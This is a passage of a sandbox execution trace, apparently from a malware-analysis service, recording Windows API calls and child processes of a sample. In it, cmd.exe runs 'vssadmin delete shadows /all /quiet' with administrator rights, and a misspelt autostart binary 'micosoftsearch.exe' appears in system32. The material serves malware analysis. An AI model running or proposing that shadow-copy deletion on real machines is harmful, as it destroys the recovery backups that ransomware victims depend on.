lpWideCharStr=0x4a45e358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0033.691] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.691] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.691] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.691] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0033.691] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.691] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.691] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.691] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0033.691] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.691] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.691] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.692] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0033.692] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.692] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.692] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.692] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e360, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0033.692] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.692] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.692] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.692] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e362, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0033.692] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.692] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.692] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.692] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e364, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0033.692] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.692] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.692] ReadFile (in: hFile=0xe8, lpBuffer=0x4a45c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x31f978, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesRead=0x31f978*=0x1, lpOverlapped=0x0) returned 1 [0033.692] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a45c320, cbMultiByte=1, lpWideCharStr=0x4a45e366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0033.692] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.692] GetFileType (hFile=0xe8) returned 0x3 [0033.692] _get_osfhandle (_FileHandle=0) returned 0xe8 [0033.692] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0033.692] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.692] GetFileType (hFile=0xf4) returned 0x3 [0033.692] _get_osfhandle (_FileHandle=1) returned 0xf4 [0033.692] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x4a45c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0033.692] WriteFile (in: hFile=0xf4, lpBuffer=0x4a45c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x31f958, lpOverlapped=0x0 | out: lpBuffer=0x4a45c320*, lpNumberOfBytesWritten=0x31f958*=0x24, lpOverlapped=0x0) returned 1 [0033.693] GetProcessHeap () returned 0xc0000 [0033.693] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x4012) returned 0xdf630 [0033.693] GetProcessHeap () returned 0xc0000 [0033.693] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdf630 | out: hHeap=0xc0000) returned 1 [0033.693] GetProcessHeap () returned 0xc0000 [0033.693] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xb0) returned 0xd97e0 [0033.693] GetProcessHeap () returned 0xc0000 [0033.693] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x22) returned 0xd4610 [0033.694] GetProcessHeap () returned 0xc0000 [0033.694] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x48) returned 0xdaa90 [0033.694] GetConsoleOutputCP () returned 0x4e3 [0033.694] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a45bfe0 | out: lpCPInfo=0x4a45bfe0) returned 1 [0033.694] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0033.694] GetConsoleTitleW (in: lpConsoleTitle=0x31f910, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0033.694] GetProcessHeap () returned 0xc0000 [0033.694] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x218) returned 0xd9910 [0033.694] GetProcessHeap () returned 0xc0000 [0033.694] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x5a) returned 0xd9b30 [0033.694] GetProcessHeap () returned 0xc0000 [0033.694] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x420) returned 0xd9090 [0033.694] SetErrorMode (uMode=0x0) returned 0x0 [0033.695] SetErrorMode (uMode=0x1) returned 0x0 [0033.695] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd90a0, lpFilePart=0x31f1a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31f1a0*="Desktop") returned 0x25 [0033.695] SetErrorMode (uMode=0x0) returned 0x1 [0033.695] GetProcessHeap () returned 0xc0000 [0033.695] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xd9090, Size=0x6e) returned 0xd9090 [0033.695] GetProcessHeap () returned 0xc0000 [0033.695] RtlSizeHeap (HeapHandle=0xc0000, Flags=0x0, MemoryPointer=0xd9090) returned 0x6e [0033.695] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a44f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0033.695] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0033.695] GetProcessHeap () returned 0xc0000 [0033.695] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x128) returned 0xd5b70 [0033.695] GetProcessHeap () returned 0xc0000 [0033.695] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x240) returned 0xc1ab0 [0033.695] GetProcessHeap () returned 0xc0000 [0033.695] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xc1ab0, Size=0x12a) returned 0xc1ab0 [0033.695] GetProcessHeap () returned 0xc0000 [0033.695] RtlSizeHeap (HeapHandle=0xc0000, Flags=0x0, MemoryPointer=0xc1ab0) returned 0x12a [0033.695] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a44f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0033.695] GetProcessHeap () returned 0xc0000 [0033.695] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xe8) returned 0xd9db0 [0033.695] GetProcessHeap () returned 0xc0000 [0033.695] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xd9db0, Size=0x7e) returned 0xd9db0 [0033.695] GetProcessHeap () returned 0xc0000 [0033.695] RtlSizeHeap (HeapHandle=0xc0000, Flags=0x0, MemoryPointer=0xd9db0) returned 0x7e [0033.695] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0033.695] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x31ef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ef10) returned 0xffffffffffffffff [0033.696] GetLastError () returned 0x2 [0033.696] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x31ef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ef10) returned 0xffffffffffffffff [0033.696] GetLastError () returned 0x2 [0033.696] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0033.696] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x31ef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ef10) returned 0xd9ba0 [0033.696] FindClose (in: hFindFile=0xd9ba0 | out: hFindFile=0xd9ba0) returned 1 [0033.696] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x31ef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ef10) returned 0xffffffffffffffff [0033.696] GetLastError () returned 0x2 [0033.696] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x31ef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x31ef10) returned 0xd9ba0 [0033.696] FindClose (in: hFindFile=0xd9ba0 | out: hFindFile=0xd9ba0) returned 1 [0033.696] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0033.696] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0033.696] GetConsoleTitleW (in: lpConsoleTitle=0x31f460, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0033.697] GetProcessHeap () returned 0xc0000 [0033.697] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x21c) returned 0xd9110 [0033.697] GetConsoleTitleW (in: lpConsoleTitle=0xd9120, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0033.697] GetProcessHeap () returned 0xc0000 [0033.697] RtlReAllocateHeap (Heap=0xc0000, Flags=0x0, Ptr=0xd9110, Size=0xc0) returned 0xd9110 [0033.697] GetProcessHeap () returned 0xc0000 [0033.697] RtlSizeHeap (HeapHandle=0xc0000, Flags=0x0, MemoryPointer=0xd9110) returned 0xc0 [0033.697] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0033.697] GetProcessHeap () returned 0xc0000 [0033.697] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd9110 | out: hHeap=0xc0000) returned 1 [0033.697] InitializeProcThreadAttributeList (in: lpAttributeList=0x31f218, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x31f1d8 | out: lpAttributeList=0x31f218, lpSize=0x31f1d8) returned 1 [0033.697] UpdateProcThreadAttribute (in: lpAttributeList=0x31f218, dwFlags=0x0, Attribute=0x60001, lpValue=0x31f1c8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x31f218, lpPreviousValue=0x0) returned 1 [0033.697] GetStartupInfoW (in: lpStartupInfo=0x31f330 | out: lpStartupInfo=0x31f330*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0033.697] GetProcessHeap () returned 0xc0000 [0033.697] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x20) returned 0xd4640 [0033.697] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0033.698] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0033.699] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0033.699] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0033.699] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0033.699] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0033.699] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0033.699] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0033.699] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0033.699] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0033.699] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0033.699] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0033.699] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0033.699] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0033.699] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0033.699] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0033.699] GetProcessHeap () returned 0xc0000 [0033.699] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd4640 | out: hHeap=0xc0000) returned 1 [0033.699] GetProcessHeap () returned 0xc0000 [0033.699] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x12) returned 0xd8900 [0033.699] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x31f250*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31f200 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x31f200*(hProcess=0x50, hThread=0x54, dwProcessId=0x9b0, dwThreadId=0x9b4)) returned 1 [0033.708] CloseHandle (hObject=0x54) returned 1 [0033.708] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0033.708] GetProcessHeap () returned 0xc0000 [0033.708] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xdeb10 | out: hHeap=0xc0000) returned 1 [0033.708] GetEnvironmentStringsW () returned 0xdeb10* [0033.708] GetProcessHeap () returned 0xc0000 [0033.708] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0xb0e) returned 0xdf630 [0033.708] FreeEnvironmentStringsW (penv=0xdeb10) returned 1 [0033.708] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x31eb08, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x31eb08, ReturnLength=0x0) returned 0x0 [0033.708] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffd5000, lpBuffer=0x31eb40, nSize=0x380, lpNumberOfBytesRead=0x31eb00 | out: lpBuffer=0x31eb40*, lpNumberOfBytesRead=0x31eb00*=0x380) returned 1 [0033.708] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) Process: id = "3" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0x4dc34000" os_pid = "0x990" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x968" cmd_line = "mode con cp select=1251" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 8 os_tid = 0x994 Process: id = "4" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x4d25d000" os_pid = "0x9b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x968" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 15 os_tid = 0x9b4 Thread: id = 21 os_tid = 0x9cc Thread: id = 22 os_tid = 0x9d0 Thread: id = 23 os_tid = 0x9d4 Thread: id = 24 os_tid = 0x9d8 Process: id = "5" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x4c761000" os_pid = "0x9dc" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x9b0" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:000754a4" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 27 os_tid = 0xa8c Thread: id = 28 os_tid = 0xa88 Thread: id = 29 os_tid = 0x9f8 Thread: id = 30 os_tid = 0x9f4 Thread: id = 31 os_tid = 0x9ec [0039.193] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe6db70 | out: lpSystemTimeAsFileTime=0xe6db70*(dwLowDateTime=0x41533710, dwHighDateTime=0x1d5351d)) [0039.193] GetCurrentProcessId () returned 0x9dc [0039.193] GetCurrentThreadId () returned 0x9ec [0039.193] GetTickCount () returned 0x19e41 [0039.193] QueryPerformanceCounter (in: lpPerformanceCount=0xe6db78 | out: lpPerformanceCount=0xe6db78*=15933259806) returned 1 [0039.193] malloc (_Size=0x100) returned 0x428e80 [0064.750] free (_Block=0x428e80) Thread: id = 32 os_tid = 0x9e8 Thread: id = 33 os_tid = 0x9e4 Thread: id = 34 os_tid = 0x9e0 Thread: id = 35 os_tid = 0xa98 Thread: id = 42 os_tid = 0xbfc Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x47867000" os_pid = "0xa90" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x9dc" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:00075f60" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 36 os_tid = 0xab4 Thread: id = 37 os_tid = 0xab0 Thread: id = 38 os_tid = 0xaac Thread: id = 39 os_tid = 0xaa8 Thread: id = 40 os_tid = 0xaa4 Thread: id = 41 os_tid = 0xa94 Thread: id = 43 os_tid = 0x738 Process: id = "7" image_name = "micosoftsearch.exe" filename = "c:\\windows\\system32\\micosoftsearch.exe" page_root = "0x75324000" os_pid = "0x544" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Windows\\System32\\MicosoftSearch.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e4d3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 44 os_tid = 0x548 [0237.977] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xbb12c980, dwHighDateTime=0x1d5351d)) [0237.977] GetCurrentProcessId () returned 0x544 [0237.977] GetCurrentThreadId () returned 0x548 [0237.977] GetTickCount () returned 0x6612 [0237.977] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=6963923041) returned 1 [0237.978] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\MicosoftSearch.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x42c114)) [0237.978] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x240000 [0237.979] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.015] GetProcAddress (hModule=0x75a00000, lpProcName="FlsAlloc") returned 0x75a14f2b [0238.015] GetProcAddress (hModule=0x75a00000, lpProcName="FlsGetValue") returned 0x75a11252 [0238.015] GetProcAddress (hModule=0x75a00000, lpProcName="FlsSetValue") returned 0x75a14208 [0238.015] GetProcAddress (hModule=0x75a00000, lpProcName="FlsFree") returned 0x75a1359f [0238.016] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a00000 [0238.016] GetProcAddress (hModule=0x75a00000, lpProcName="EncodePointer") returned 0x77450fcb [0238.043] GetModuleHandleW 